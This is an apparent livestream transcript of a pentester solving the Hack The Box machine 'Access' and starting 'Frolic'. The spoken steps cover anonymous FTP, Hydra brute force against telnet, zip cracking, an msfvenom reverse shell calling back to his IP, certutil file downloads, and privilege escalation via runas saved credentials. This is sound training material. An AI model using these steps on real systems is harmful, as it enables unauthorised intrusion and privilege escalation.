This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. Alright, so today we have access from Hack the Box. What's up, Yorlin? Welcome to the stream. Thanks for stopping in. Alright, so we're going to copy our IP address here. And we got rustscan -A. A stands for address, so that's our target IP address. -R is the range of ports that we want to scan. So in this case, it's 1 through 65,535, which is every single port. And rustscan, if you don't know, is a very fast port scanner. It uses Nmap in the background, but it's a lot faster than Nmap. As you can see, it already detected 3 ports open. Do not use this in a real engagement. Do not use this in a real production environment. This is really only for CTFs, or if you're kind of desperate in a real engagement, maybe throw it out there, but it's so fast that it could cause problems in the production environment. So be careful running this in a production environment. That being said, we got port 80 open, so let's see what's on port 80. So we will open up a new tab in our browser here, paste our IP address, see what we got. We got some servers in Lone MC. Let's go ahead and view the page source, see if there's any hints in here. We got Megacorp. I'm not seeing anything else here that's interesting, so I'm going to close out of that. Let's go ahead and do some directory fuzzing here. We're going to do Ferox Buster. Jerry, that was the last box that we did. And we're actually going to do this. We're going to File New. And we're going to nano our Etsy host, and we're going to put this box in our Etsy host file. So this IP address, what's the name of this box? Access. Access. That way I can type in access http://access, and it takes us to the same website like that. So now I can also get rid of 8080 here. We can even get rid of .htv, so I didn't put that in my Etsy host. We can do access, and we're going to use this word list here. It's a pretty good one. We're going to run that. There we go. So we're fuzzing the web server. See if we get anything useful. We got port 21 open and 23 telnets open on this, dude. I don't know how I missed that at first, but telnet, dude. Well, let's telnet access. Try connected to access. Escape character is. Dude, we're in. Welcome to Microsoft Telnet service. Login. Let's try blank. Let's try blank password. Invalid. Alright. Login. Let's try guest. Telnet connection not allowed for the guest account. Alright. Let's try anonymous. ANONYMOUS. Password. Let's try nothing. The handle is invalid. Let's try root. Password blank. Login failed. Alright, well, that's okay. Let's do Hydra Hydra. Man, how do I forget I don't know how to use Hydra. I just made a video about this. Matter of fact, guys, I don't memorize syntax. I just don't. I'm not the guy for that. I got everything in my notes, man. There's no point in I know I need to use Hydra here, but I forget the syntax for it exactly. And instead of trial and error, I just go straight to my notes, dude. I could probably figure it out if I do a -H, but it would be way faster if I just go to Hydra here, and then I do Telnet. I don't have one for Telnet. It's going to be very similar to SSH, so we're just going to copy this. All right, well, let's try, I don't know. Let's try administrator. Just because why not? You know what I mean? Wordless pass, so we'll do /user/share/wordless/ no, it's not user with an E. It's user with just the R /user/share/wordless/rocku.txt. There we go. For our password list, target IP address. Is it still my clipboard? No, that's my. I thought the IP address is still my clipboard. I was incorrect. Let's get our IP address again. Unfortunately, I don't think you can just specify the host name. So then we'll do telnet here. See if that works. No passwords. What did I do wrong? User share. Is it not user share wordless? Rocky.txt. What did I do? User. Oh, I know what I did wrong. No, I put a slash. Change directory / user share wordless. Do I not have Rocku anymore? No, Rocku's here. What? I don't understand what's going on. Oh, it's wordless with an S, guys. There we go. That's what we got. That's what we need. All right, let's try that. Yeah, I already fired up for rocks. I haven't looked at any of the output yet, though. We're going to rename this to Hydra. Hydra. Let's close out of this tab here. Close out of this tab too. This is Furox. Dang, Furox found nothing. Furox. Alright, well, let's try a different word list. And let's try this one. Let's try the seclist raf_large_files.txt, see if we get anything here. In the meantime, we have port 21 open. Let's run another Rust scan again. Sometimes it's a little unreliable. It's too fast. It's a little unreliable sometimes. So we run it again. And if we run this again, we can be pretty confident that there's only 3 ports open. In the meantime, let's open up FTP. FTP access. Let's try anonymous. Anonymous access allowed. Let's send nothing as a password. User logged in. Look at that. We are logged in anonymously. Oh, look at that. We got backups and we got engineer. Let's do change directory backups. See if we get anything in here. Backup.mdb. So I think it's get. Oh man, is it get backup.mdb? We actually want to do. Let me open up a new tab here. We want to make directory hack the box / access, and then we will get backup.mdb and we will put it in /root / hack the box / access. Port command successful. Data connection already open. Transfer starting. Can't because we have to do. Let's try that again. Access / what's the name of this file? Backup.mdb. So basically all I'm doing is downloading that file and putting it on my server. So it should be here. Nope. Change directory, hack the box, access. Look at that. Let's do tab backup. You know what? There's too much to look through here, so we're going to clear this out. We're going to do strings. We're going to clear out the output just a little bit. Strings and backup. We got administrator. That's really good to see. We see any passwords? These might be passwords. Auth user, auth user. That might be a password. There's a lot of output here. Nothing's sticking out at me. We don't really know what these random letters are. So what we're gonna do. This is really good. Access for use at security. Backup admin. So what we need to do is let's go ahead and rep for admin. What? I guess you can grep admin for backup. Binary file matches. I don't know what that means. It's cat backup. Oh, let's look here. Let's just kind of go mainly through it, I guess. See if we can find anything. It's kind of strange. Why can't I grep through this? You know what I mean? User ID. Workday 1. Overlap workday trial over. Put in double quotes. Oh. Yeah, you're right. Thanks. I told you, syntax is not my thing. Still not doing it. Still not giving it to me. Check out fur rocks here. Still nothing interesting on fur rocks. Let's change files to directories. If I can spell directories right. Directories. There we go. Well, let's go back to our FTP server. We close the connection, so we got to exit here. Clear this out, and we will FTP access again. LN1 LUS. No password. We will change directory into engineer this time. See if there's any more files. See here, we got access control.zip, so we're gonna do get. We gotta put this in double quotes. Access control.zip. That sounds very interesting, especially since the name of the box is access. Get access control.zip, and we're gonna put it into root / hackthebox / access / access control.zip. See if that works. Let's go back to our. There can be some good stuff in that backups, but I don't feel like looking through it right now. Let's see if there's an easy one in the access control before we really dive deep in that backup.mdb. I mean, MDB stands for, might be like Microsoft database, management database. It sounds interesting, you know what I mean? I think there might be an actual password in there. We just gotta dig through it. But let's do unzip access control.zip. And why did that unzip not work? Huh? Why did that not work? Can you not use a string output as a wordless in Hydra? Ooh, that's a good idea. I did not think of that. That is a really good idea. NDB file is a binary database file format used in Microsoft Access before 2007. Oh, got it. Well, thanks for that information. Alright, well, I don't know how to unzip this full file, guys. Gunzip's a thing, right? Gunzip access control, can I do that? That's to zip it. How do I Oh gosh, why can't I just do regular unzip? Gross. Just an access control.pst inside of this. Is there anything else useful in here? No. I don't know why I can't unzip that. That's a little frustrating. Backup. Compression method 99 error indicates that AES. Unfortunately, this encryption standard is currently not supported by unzip binary. Oh. So it's encrypted. So I can't see it. Backup admin, engineer, access for use as security. Try 7-zip. Do I even have 7-zip on this thing, dude? Dude, I don't have 7-zip installed. How do I app install 7-zip? I can't believe I made it this far. This is an old box too. I actually need to update my Kali Linux to the newest version, but this is like a few quarters out of date. Let's do 7-zip. Wait, why can't I just do 7-zip? 7-zip's not found. How do I use 7-zip? Is it P7-zip? -D 7ZA. Oh, well, that makes sense. Oh gosh, so many options here. How do I uncompress? Command switches, archive, file name. All right, well that's cool, but I just need to know how to uncompress something. Delete files. Why is there so many options? X. Oh, here we go. Wait, it's exclude file names. 7ZAX? Oh, here we go. Extract files with full paths. Oh, it's not dash S, it's just regular X. Okay, that's really weird. X, and then what's the name of that file again? Access.zip. Enter password will not be encoded. I don't know the password. Wrong password. I need to know the password, so we'll keep that in our back pocket if we find a password laying around, and we can do that later. So in the meantime, Buster found access ASP client. I don't think any of this is useful. Client system web. Let's just go here, I guess, and see if there's anything useful here. But I doubt it. Yeah, I didn't think so. All right. You try to brute force it. Yeah, you're right. I think we're gonna get a decent password list out of this backup.ndb. So let's do strings backup. I don't know, man. Let's try. There's a lot of gibberish in here, but we got some usernames. So what we're gonna do is we're gonna copy. We're gonna copy all this. See if we see any other kind of potentially useful usernames here. User info, add personnel, personnel engineer, personnel admin, delete personal permission. All right, let's make a word list. That was a Yorlin. Your tip is god tier. I don't know why I wouldn't have thought of that, but let's do this. Let's do nano users.txt, and we will paste this, and let's just get rid of duplicates here. You know what? I hate nano sometimes. Let's do mousepad. Alright, let's do administrator without a word character. And let's do administrator without a word character with a lowercase a. That doesn't look like a user to me. That doesn't look like a user to me. Hey, that's the new follow alert. Thanks for the follow, Pedro. Am I saying that right? Let's look. Thanks for the follow. Yeah, and Pedro Miguel. Thanks for the follow. Thank you so much. Thanks for stopping in. How you doing today? And Pedro Miguel. Alright, so we're getting rid of that. Depart, that doesn't look like a username to me. That doesn't look like a username to me. User might be a username. Close restart file, doesn't look like usernames to me. Permission doesn't look like a username to me. No, we'll leave one of these. That might be a username. Backup admin definitely looks like a potential username. Admin, definitely a potential username. Engineer, same thing. Access for you. Security, let's try access for you by itself. And admin, we already have admin in the list. So this is going to be our username list here. Access for you. Control S, save that. And then now what we're going to do is we're going to strings backup.ndb, and we're going to put this in a file called passwords.txt. And what we're going to do is we're going to go back to Hydra here. And, well, let's just do Hydra. Let's go back in my Hydra command because I done forgot it already somehow. So there's a few different things we can brute force here. We can do telnet. We can also brute force the file, the zip file that we found that's password encrypted. Wordless path, passwords.txt, and then we need to change this to a capital L because we're supplying a list, not a single username. And we will do users.txt, and hopefully that gets us a win. We shall see. How do I brute force a zip file though, a 7-zip? That's what I need to know. I think there's a way to do that with John the Ripper. I just gotta remember how to do it. If I or at least find it in my notes. Let's just Google it, dude. Google. Let's do John the Ripper zip file. Use John the Ripper to break password protected zip. Perfect. That's exactly what we need. Zip to John. Thank you. Yeah, here we go. Ryan was able to put in the chat before I could even Google it. Ryan's on top of it. Ryan is he's smart, man. He knows. He knows a lot of stuff. Alright, well, we'll keep our Hydra. This is no longer my relevant Hydra. This is now my new Hydra. Keep these organized. For rocks didn't return nothing, guys. We're gonna leave this open just in case we need it later. This is our port scans. Let's do a comprehensive mmap scan because we haven't done that yet, but I don't think we need to do that, but yeah, no, it doesn't hurt to let that run in the background while we're checking out other stuff, you know what I mean? To find a huge vulnerability in one of these services. So our IP address is over here. Ports 21, 23, and 80. And that's all we need to put. I'm doing good. I was searching for people who work in this field, and I just watching you hack the box, and I am a noob. I was wondering if I could have some tips and ideas because I've just completed a cybersecurity course, but I'm looking for internships in Portugal, and I find it super difficult to find companies that accept it. By the way, it's level 5, one level before the degree, which is level 6. I mean, yeah, the job market is really bad right now. It's hard to find positions right now. It's hard to find internships. The only thing I would say is just lab every day. Maybe get a handful of certifications because that helped me. That's what I did. I think certifications are more powerful than a degree. Like, keep doing your degree, but also do certifications on the side because the degree unfortunately isn't enough. CompTIA, I mean, you can start with some of the entry level CompTIA stuff, but you want to do some hands-on stuff too. So it depends on what you want to do. Like, if you want to be a blue teamer or a pen tester, you like I would go for the hands-on certifications. Like if you want to be a pen tester, for example, I would go to TCM Junior Pen Testing Certification or the EJPT, that's INE Security Junior Pen Tester. Or if you want to go blue teaming, I would go offensivesecurity Certified Defensive Security Analyst or Hack the Box. I forget it's called, cybersecurity analyst or something. There's a blue team cert for Hack the Box and offsec. So, and I would get like a CompTIA, like Security Plus at least Security Plus, and then I would try to go get a hands-on cert. Red Team. So yeah, I would get CompTIA Security Plus, maybe Pentest Plus if you think you need a baby step between Security Plus and like an EJPT or like a junior pen tester from DCM. I did Pentest Plus before I did EJPT, and that helped me out a lot. I went through EJPT very quickly because I had Pentest Plus, but you don't need to get Pentest Plus, honestly. But it doesn't hurt. I would say Pentest Plus is just going to cut down time on your EJPT. Or your TCM Security Junior Pen Tester. All right, let's go ahead and resume what we're doing. So we need to do zip to John. It's zip to John, your file zip. So it's, well, let's do change directory, hack the box / access, zip to John. And then we need to do access control, and then we'll do hash.txt. We'll do zip hash.txt, I guess. And then we will do John, finish that, and then we'll just put zip over here. Zip hash. See if we can get that to work. That'd be pretty cash money if we can get that to bust. Port scan still going on. Yeah, Hack the Box is good. I mean, there's a reason why I do Hack the Box twice a week now. I think this keeps my skills sharp, and I'll learn something every week. You know what I mean? And that's why I stream it, so other people can learn too. Which is why I stopped doing active machines and started doing retired machines. So you can't stream the active machines, you can only stream the retired machines. Do you think SOC is a good thing to start in this area? Yeah, I do. Especially if you want to get into pen tester, because getting into pen testing is extremely difficult. It's a lot harder than blue team positions. There's more blue team positions right now than there are pen testing positions, and I believe that will always be the case. I don't think that will ever change. And the reason why I think it will never change is because companies, they tend to build up a cyber defense before they build up a cyber offense. So you can't have a cyber offense, you can't have a red team, you can't have a penetration testing team unless you have at least a mature defensive security posture. And companies will always put a security posture up before they do pen tests. Otherwise, pen testing doesn't make sense if there's not already some mechanisms in place for cyber defense. All right. Well, we got Hydra doing its thing. We got Zeta John doing its thing. Hopefully one of these busts. Name this John so I know what's on this tab. What's on this tab? FTP access. I think we got all the files, guys. Let's go ahead and log back in and just double check. I think I already downloaded all the files. Anonymous, and we will do no password. And we will do ls, change direct. Oh, wait, what just happened? Entering passive mode address mismatch. Why am I in passive mode? Let's try that again. There's a way to switch it, I think. ANONYMOUS. Password, nothing. LS. How do I get out of passive mode? Why am I in passive mode all of a sudden? So to disable passive mode, you just type passive. Just run passive within the client. Oh, that's weird. All right, let's do passive. I think my machine died. What's up, Tech with Cody? Welcome back to the stream. How you been? But red team is more complex than blue team. It's debatable. It's debatable. It could go either way. They both are extremely complicated. It's not, neither one of them is easy. I would say like getting into red teaming and pen testing is harder on a skill wise than getting into blue teaming, and that's kind of a hot take. You know, I'm saying that red teaming and pen testing is more difficult than blue teaming. I think it requires much more training. I think it requires a lot more attention to detail. But it can go either way. Blue teamers are probably going to tell you the opposite of that. So it can go either way. But in my opinion, I think pen testing and red teaming is more challenging field than blue teaming. But there's also things with blue teaming that you don't get with pen testing. So for me, like, I don't have to work weird hours and stuff like that. Whereas if you work in a SOC, you might have to work a night shift. You might have to stay over a few hours. Whereas for me as a pen tester, like, mine's 9 to 5, like, you know, on repeat, and I don't really pen test outside of regular hours. So there's pros and cons to each one. Let's try FTP again. I don't know why FTP is not working all of a sudden, dude. It was working earlier. There we go. Extended passive mode. I don't want that. Man, this is whack. Passive. Passive mode off. Cannot. Opening ASCII mode off. There's a command for this one too. Why did this break all of a sudden? It was working just fine. All I want to do is verify that I got every file out of the FTP server. I think I did. I just wanted to double check, but if it's going to be this complicated, then I'm not going to double check. I don't understand why I can't get back in it. Ferox might have crashed the machine. Or... oh man, John didn't work. Maybe FTP. No, Ferox. You know what? Let's just refresh it. Let's refresh this. Is this still working? This is still working, dude. So the machine's still up. Well, let's do, instead of doing RockU as our word list, let's do passwords.txt. It worked! It's just access for you security, dude. That's the literal password. Look at that, dude. Now, how did we do that? It was 7ZA, right? X, and then whatever. What? What's going on here? Enter password. It's just access control PST. Cat. Access control PST. Oh gosh, what is this? I'm not seeing anything useful in here, dude. Do we even do this right? How do I read a PST file? How do we read a PST file? How to read? I know it's an email file. I don't know how to read it though, because I don't have an email client like built into my Kali Linux. PST file in Linux. What's up, Nixon? Welcome to the stream. Thanks for hopping in. Glad to see you here. Reading Linux command line. Try read PST. Is that built into the... It's not built in, but we can download it. Okay, just restart them all, I guess. I don't know. Re-PST. Re-PST options file name. Well, let's just add a file. Access control.pst. Access control 2 items done. Opening PST file and indexes. Proceeding. Processing folder. Deleted items. Access control 2 items done. What does that even mean, dude? Access control.inbox. Let's do cat. Access control inbox. Oh, here we go. We got something here. Oh gosh. Start from the top, I guess. Alright. Oh, we got an email. A legitimate email here that someone sent. Let's just skim through. Well, we're not going to skim through this. We're actually going to read everything because I feel like there's going to be some super sensitive information in here. Hi there. The password for the security account has been changed to... There we go. We did it. Please ensure this is passed to all your engineers for the security account. So let's just actually add this entire line to my notes. We did it. We got a password for a security account. We'll start a telnet with that, I guess. See what happens. Relogin. What just happened? Get that out of here. So can I just log in with FT or telnet now? Maybe. Telnet security at access. No name or service not known. I think we just do telnet access. No more connections are allowed to telnet server. Bruh, it was working earlier. Do I gotta revert to machine? How much RAM are you running on this Kali? 10 maybe? I don't know, honestly. 10 kilobytes. No, I'm kidding. Gigabytes. Well, I think we need to stop brute force. Oh, that's why. We gotta stop brute forcing telnet. That's why. Okay, let's try that again. Hey, it's working now. Ah. You can't log in and brute force at the same time. Login. Security. Password. We're gonna copy our password that we just found. We're in, dude! We're freaking in! Oh! I love this. I love it. Alright, let's do user security. Oh, we can't do ls for on Windows. dir. Change directory desktop. dir. There's a user flag. Type user.txt. Boom, baby. That was fun. That was pretty straightforward. It wasn't like stupid easy, but it wasn't stupid hard either. So it was like, it's a good balance of fun and had a few steps that we had to do there. I like it when it's like a few steps. You know? Alright, now I gotta figure out how to... This was very easy. Dopamine release is epic. Yeah, it never fails. Well, there's sometimes where it's like, where it isn't, the throw doesn't hit you, but sometimes it does. You know, it just depends on the situation, right? Let's see here. We gotta figure out how to elevate our privileges, guys. So let's do, I don't know. Let's go back to the root directory here, the C drive. ZK Techo? That seems extremely interesting. So this is change directory ZK Techo. I'm looking at this, by the way, if you guys don't know. dir ZK Access 3.5, so change directory. Is there tab autocomplete in this? No, there's not. 3.5. Oh gosh. There's a lot of DLLs in here. Ooh, can we do some DLL injection, dude? Change log. There's gotta be some kind of DLL injection that we can throw in here. There's a lot going on in here. We just gotta access.exe. Access SQL. I'm just trying to think what we can try here. I think maybe if we can write in here somewhere, like maybe right over a DLL or right over exe. I'm thinking that's it, dude. I think what we need is in this directory. I'm pretty confident on that. We just need to just check the permissions of the stuff. So that being said, we are going to go back to my GitHub and we are going to go to hacking notes and we're going to go to privilege escalation, Windows, PowerShell history. That's not what I'm looking for. Retrieve credentials from PuTTY, schedule tasks. Always install elevated. Insecure permissions on service executable. That's what I want. I knew it was in there somewhere. The service name. Oh, why can't I delete? Why is it not deleting? I'm hitting backspace. Guys, I can't delete anything. Oh, maybe because I hit insert, maybe? I have no idea what just happened. What the heck? Oh, gosh. Well, I don't know what's going on here. Let's try this again. I don't know what happened to my shell, but we're gonna relog in here. Actually, you know what? Let's just do this. We're overcomplicating it, guys. Let's just copy ZK Access 3.5 and see if there's a vulnerability for that that's publicly out there. Look at that. Oh, that's what we want. Oh, that's exactly what we want. Insecure. I knew there was going to be some kind of insecure file permissions. Yeah. Yup. Okay. This is what I was going to look up anyways, but this just kind of confirmed that I was on the right track. So what we need to do is, how do we take advantage of this? I think we just need to just insecure file permission. So I think we just need to replace the binary, dude. if I can replace one of these DLLs, or I can replace access.exe. If these are running on startup, then we got it. We just got to figure out if they're running on startup. We got to figure out how to restart a Windows machine from a terminal. It's in my notes somewhere. Let me look. Forget to command to restart a Windows machine from the terminal. It's shutdown -R, I think, to restart. Reboot Windows from the CMD. Shutdown/R. Okay. I don't know why I forgot that, but that is why we have Google. We're gonna put that in our notes so I have that command for later. So we need to figure out if access is currently running, access.exe is currently running, then that means it starts on startup. And if I can replace access.exe with a malicious version of access.exe and I can restart the computer, then I can get a reverse shell as system, anti-authority system. So let's go back to my hacking notes here. We want to do this. Or if I can restart the service. If I can start the service and restart it, we don't even need to restart the machine. We can also do that too. I forgot that. We don't even need to restart the machine. So let's do... dude, I cannot. I'm not allowed to backspace when I'm in Telnet. That's kind of strange. Let's just do this. It's got to be access, right? Because the name of the machine's access. Oh, I can't even do up arrow key to try it again. Access.exe. Beside service does not exist as an installed service. Are there any other services on here? Maybe access SQL. Well, let's see list services then. How do we list? How do I list all the services? There's a way to do that too. Might be in my private notes, guys. Let me look here. SE query state equals all. Really? Are you using 4 screens? How'd you figure it out? You always see me go left, right, up, and down. Yeah, I have 4. I have 4 monitors. I can only show you guys one monitor though. That's what sucks. But the monitor I was looking at, I can't show you that. It's in my private notes, unfortunately. That did not work. If you can get into PowerShell, you can get service. Can I do PowerShell? We can get into PowerShell. Looks like maybe. We'll see. Alright, we are in PowerShell, but it doesn't look like much. Okay, let's try. Is it just get service and that's it? Like that? Is there anything else I gotta add to that? No quotes. Doesn't seem like it's liking me. I thought I had a command here that had something that listed all the services. Here we go. It's task list space / SVC. WMI PRVSE. Telnet server.exe. I don't see anything with the. I feel like this is. It says insecure permissions. Man, I don't know. This is frustrating because it doesn't seem like it's running. So what's the point of taking over access.exe when it's not even running, you know what I mean? Telnet server. These all have insecure permissions, but if they're not running, then what's the point? I mean, if I start it, can I start access.exe maybe? One piece? Yeah, that's what I need to do. It's still one piece up. If I can. Let's do this. Change directory / tools. I just closed out of that on accident. Did not mean to do that. I don't know how I did that. I just right clicked. I didn't even left click. We're going to use CertUtil to transfer WinPs over. So I'm going to go like this. And then I'm going to change this to winpeas.exe. And our IP address is not that. It is 10.10.16.2. And we will call this winpeas.exe. Copy this command here. Go back to our initial access. We do change directory C : is there a temp? Change directory temp. SQL source. That sounds really interesting. Let's do CertUtil. Boom. See if that works. Failed? How did it fail? Why did it fail? 404 message not found. Do I not have WinPs on? Ah, I got it as WinPs x64. Let's try that again. WinPs x64. Right? Is that right? WinPs x64. Yeah. That's not where I want to put that at. I want to put that in here. That should work. Getting establish the connection because I don't have the server running. Aha. Run the server again. Say that one more time. Status 200. Now we will do PIR. WinPs is sitting right there. Do this. We'll run WinPs. This program is blocked by group policy. Gosh, no. That sucks. Can we move? Make a different directory here, call it TMP. See if it will work in a different directory maybe. The one that I created myself. But I doubt it. But it's worth a shot. Blocked. They blocked it. Alright, they didn't want to make it that easy. Alright, well that's fine. We're on the right track. We just got to figure out how to... I don't know. I just don't understand why the vulnerabilities in that access folder, but there's no... It's not currently running. Maybe if I just change it and then just started it? I don't know. Let's go back to my GitHub here. It's not a service though. Gosh, I don't like this telnet stuff. Change directory, cd:/. There we go. Change directory, zk techo. Change directory, zk access 3.5. Persistent cross-site scripting, that's not what I need. That's what I need right here. But it doesn't tell you how to exploit. I don't know why they didn't throw that in there. Like, oh yeah, just replace this and then. But let's just start replacing stuff, dude. That's the only way we're gonna do it. I think let's go ahead and start up a listener. netcat-ln vp 443. So that way if we and we're going to not ccolon, it's root hack the box / access. Alright. And let's do MSF Venom, pretty much all of that. But we're going to do an exe and we're going to call this access. Access.exe format is exe. Our IP address is 16.2 and we don't want to do a JavaScript. We want to do Windows /x64 / shell / reverse TCP. And actually we want to do this as a non-staged payload. Let's try that. You can try a different enumeration script. Yeah, you're right. I think I'm just going to replace access exe here and just see if that works. So what we're going to do is we're going to start up our Python server again, and we are going to see if we can just overwrite access exe by doing a assert util, see if that works. Access is denied. Well, darn. What if we do change directory ccolon temp? Try this again. It's gonna let me put this here and just move access.exe to what's the name of this? We're going to move that to here. Overwrite it? Yes. Access is denied. I thought we had full access to this, dude. Well, that was a big lie. Alright, well, darn. Go back to my GitHub here. I could have. Of course, that's not gonna work. Not what I wanted. I never put anything else on my clipboard. I wanted this. I don't know why I'm copying and pasting this. It's literally like 5 letters. See, they run this. See if they got the same. This got read and execute. Wait, we don't even have right access to this. What group are we in? Authenticated users? Full. Built-in administrators. Is an engineer. Maybe we have to become engineer. I hate Telnet. I hate how I can't backspace when I type something. Full name, security. Telnet clients, we're in the users. That's it. Just Telnet clients and users. This is... Maybe that's not the way. Am I not in the seat room? What? Change directory. Program files. Common files, VMware. Nothing looks interesting there. Change directory. Program files. x86. FP sensor. That looks interesting to me. Change directory. FP sensor. bin biokey.
Access granted.
Hey, got a follower. Who did it? Gerlin. Thanks for the follow. Appreciate you. Thank you so much. One of these enum scripts. Alright, let's try it out. Man, I don't know if PowerShell was going to work for me right now. Let's go back to here. Let's do change directory C:// yeah. Oh, here we go. Here's how you list running commands on Windows. This is a PowerShell thing. See if that works. I think PowerShell just not working for me, guys. Like, I mean, maybe I can try to do a reverse shell here. Yeah, let's try this. We gotta get a better, more stable shell. That's all there is to it. Do I have? We have access.exe here. Can I run access.exe? If I can run access.exe, then it's gonna give us a more stable shell. Blocked. I can't run anything, dude. I can't run any exes. sc.exe query type equals all. I can't get PowerShell to work. I can't get a reverse shell. That's That's frustrating. Dude, we got it on the box so fast and I'm stuck. I can't believe I'm stuck on this. This should be easy. I don't know why it's so hard. This telnet shell is awful. And I don't know how to get a stable shell. If I can do PowerShell, it would make my life so much easier. PowerShell EXE not working, dude. I mean, I can do who am I, but I can't run other PowerShell commands. Yeah, no problem, Yorlin. Thanks for stopping in, man. Thanks for add the rest to it. What do you mean add the rest to it? Oh yeah, I'm gonna add that real quick. I'm gonna run this. Jaws enu. I just called it Jaws. Did I not put the Jaws on here? Where did I put that? Did I put it in temp? There's Jaws. Let's see if that works. It was working. I guess we just gotta wait. Wait until something happens here. Password. What is this program is blocked by group policy, of course. Looking for simple privex. Properly default password does not exist. Here's all our information we just got. Didn't get a password. I'm gonna scroll all the way to the top and work my way down, but dang, that's a lot of. This is a nice little tool, alternative to One Piece for sure. I wonder if I have to become engineer at all. Progress to engineer, then become an admin, you know what I mean? process ID. These all look like standard processes. VG Osers looks kind of interesting to me. Scheduled tasks. Task name. Look. Ooh, this looks interesting. Run as local service. If I can write that DLO, then that would be pretty nice. But is it run automatically? I don't know. Oh gosh, there's a lot of tasks here. Run as user administrator. Server manager.exe. Is this automatically ran though, or is this set to manual? This says automated and this is manual. I wish it would tell me when, how often they ran. Let's keep going down. Services. Yaw cam. That sounds interesting. Why is there so many things in yaw cam? Huh, I don't know, man. I'm not seeing anything that really sticks out to me. I mean, maybe this yaw cam thing. You know what I mean? Maybe there's something in there. But right there? What do you mean, the yaw cam? Check that. Uh, nothing in the logs. At the bottom? You mean the settings? Look at the stored cred. Where? So you're saying, yeah, but it doesn't have anything here though. Interactive. How do I get this? Target domain interactive equals access administrator. That makes sense. Type domain password. How do I extract stored creds though? Or I have to Google it. I don't know how to get the creds. Where would that even be at? How to read stored creds windows. Do we just do run as without? So you're saying I just do run as with and don't supply the password? It's already there, right? So I can just do run as administrator, and then it would just run as administrator. I gotta put run as on the system though. Do I have run as directory tool? Run as cs.cs. So we need to do this. And then I got the compile commands right here. Cat run as compile commands. Check .NET framework. Okay. Gotta figure out what .NET we're on. Is it built into Windows? Dude, I've had so many hack the box machines where it wasn't built in, dude. I'm telling you. Or maybe I'm just crazy, but where I'd have to put run as manually on the machine. Run as administrator. Run as administrator. How do you do run as? What's the syntax for that? Alright, so the domain name is access. The username is administrator. ATOR. Program is C:/TMP/access.exe. See if that works. Enter the password for access administrator. We don't know the password. It's not stored like we thought it was going to be. Domain password. I don't know. Just type in run as. And then hit enter. It's not, nothing's going on. I don't think it's built in the machine, man. I'm just gonna we'll put it on the machine. Run as compile. No, we want this. We have to figure out what .NET framework we got. Oops. No, it is on the machine because it said enter the password. It is on the machine because it wouldn't have prompt us for a password. I don't think that's the way. I mean, it might be, but oh, I'll look at the link that you just sent, Nixon, but I feel like if I don't have the password, then how am I going to get this to work? Via store credentials. That's exactly what we got. Oh, okay. We're on the right track here. I mean, we got very similar results to that. So run as /env, no profile, save cred user. Well, let's try that command there. User is access administrator. Let's see how that works. Doesn't seem like it worked. I didn't get any response. I didn't get prompted for a password though. Let's just try to tell it to oh, it brought it to a file, that's why. Oh, type whoami.txt. Oh wow, okay. Yeah, that works. That's why I didn't show up. Because it was piping it to a thing. So now all I gotta do is just do c://tmp/access.exe. This should give me a reverse show as this admin. Let's see if it worked. It worked. Who am I? We're the administrator. We did it. Yo, Nixon, thanks for that link. That was a game changer. I did not have that in my notes. Thank you. We're almost there, gang. We did it. Man, I brain farted there. I don't know why it took me so long to do that, but thank you. Thank you for the nudges. We just got to do man, my brain is melted, guys. I've been working a lot lately. c:/user/administrator/desktop/ we'll just go there. Oh gosh. Type c:/user/administrator/desktop/root.txt. There we go. Perfect. And we will submit that on our Hack the Box dashboard. I don't know if LinkedIn's blocked my comments earlier. It might have been. I noticed it was being kind of weird. We did it. How long did that take us? It took us way too long to get to elevator privileges. Hey, we got it though. A win's a win. I'm gonna give that one an easy. It wasn't too bad. I was just brain farting. I mean, I did Pwned in an hour and a half. That's pretty good. Hour and 40 minutes. I mean, that's pretty good for an easy box, man. Could have been faster if I was not brain farting, but yeah. Let's go to the official write-up and see. No, that's not what I wanted. Oh, we can rate the matrix. Common vulnerabilities. I don't even know how to, I don't know how to, I'm not going to do this. I wanted to walkthroughs. Let's see if we did this the intended route, guys. I'm assuming getting telnet access was the intended route, but the pretext might have not been the intended route, but it probably was. Alright, so we did this FTP. We got the zip. Yeah, we got the zip file. Did they not? Wow, we did this the kind of a backwards way. We could have just done MDB export backup NDB auth user and just logged right in and got that information. We didn't even have to crack anything, like at all. But it is what it is. So yeah, they got that information. The foothold, they got that same email. Yep, got that password. Post exploitation upgrading from telnet shell. Yeah, I wish I would have done this earlier. That was a pain in my butt. Identification of safe credentials. Yeah, that's exactly what we took advantage of. What did they do? I want to add this to my notes, that last command that we just ran. Alright. We did this intended route. We can close out everything that we had open here. And we can move on to the next machine. So let's go ahead and shut this down. Close, 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 close. And then we want to go to machines, retire machines. And the next machine we have on the list is Frolic. Frolic, whatever that means. This looks cool. It's like a ninja guy. Or is that a ninja? I don't know what that is. Spawn a machine here. We can close out of all these tabs too. Frolic as in skipping with joy? Is that what that means? Let's refresh the page here to see if we can get the IP address. Still spawning. It always puts you in guided mode. I don't like that. I wish it would just start me off in adventure mode and then I would have to manually toggle guided mode. Alright, let's go ahead and start this up. Let's do our Rust scan here. We got 22 open, 139, 445, so maybe some SMBs action here. 1880 and 9999. That was extremely fast. Let's run this one more time. Confirm those results. Hopefully this isn't a brain scratcher. My brain's kind of fried, I ain't gonna lie, right now. Looks like the same results. So, I gotta know what these are. So let's do our in-map scan here. And we gotta do 22. 139. 140, sorry, 445, 180, 9999. Yeah, 180 and 9999 is two ports that I'm not familiar with, so maybe something there. People on YouTube should like, comment, and sub. They should do that once this goes live. Unfortunately, I'm not streaming on YouTube because I have a channel strike because YouTube hates me, man. YouTube really does hate me. They don't like me. They don't like me. I don't know what I was just trying to teach people how to hack, how to make the internet more secure, you know. That's all I'm trying to do. I never told anybody to hack illegally. Never once. Well, in the meantime, we can see if we can log into that SMB client. So I'll put on my GitHub notes again. I should have probably just left that part open, but it is what it is. People on Twitch should follow this channel if they haven't already. That would be pretty cash money. It still says I'm in Anchorage, Alaska. I have to change that. I'm not in Anchorage anymore, guys. Let's go to my hacking notes. And let's go to... Was it my... I think it was my EJPT notes. Enumeration. SMB. Look at that. We did a new for Linux. Let's do that first. New for Linux, and our target IP address is this one. See if we can get anything useful out of here. Allow sessions using username and password. So it looks like they got anonymous login. Let's just log in with SMB client here. See what we got. Where's SMB client? Null login. Try that. Get our IP address again. We got a print and IPC. That doesn't look good. Looks like it's kind of whack. Samba share probably. Oh, that's why I did the dash O. I shouldn't have done that one. We should do... 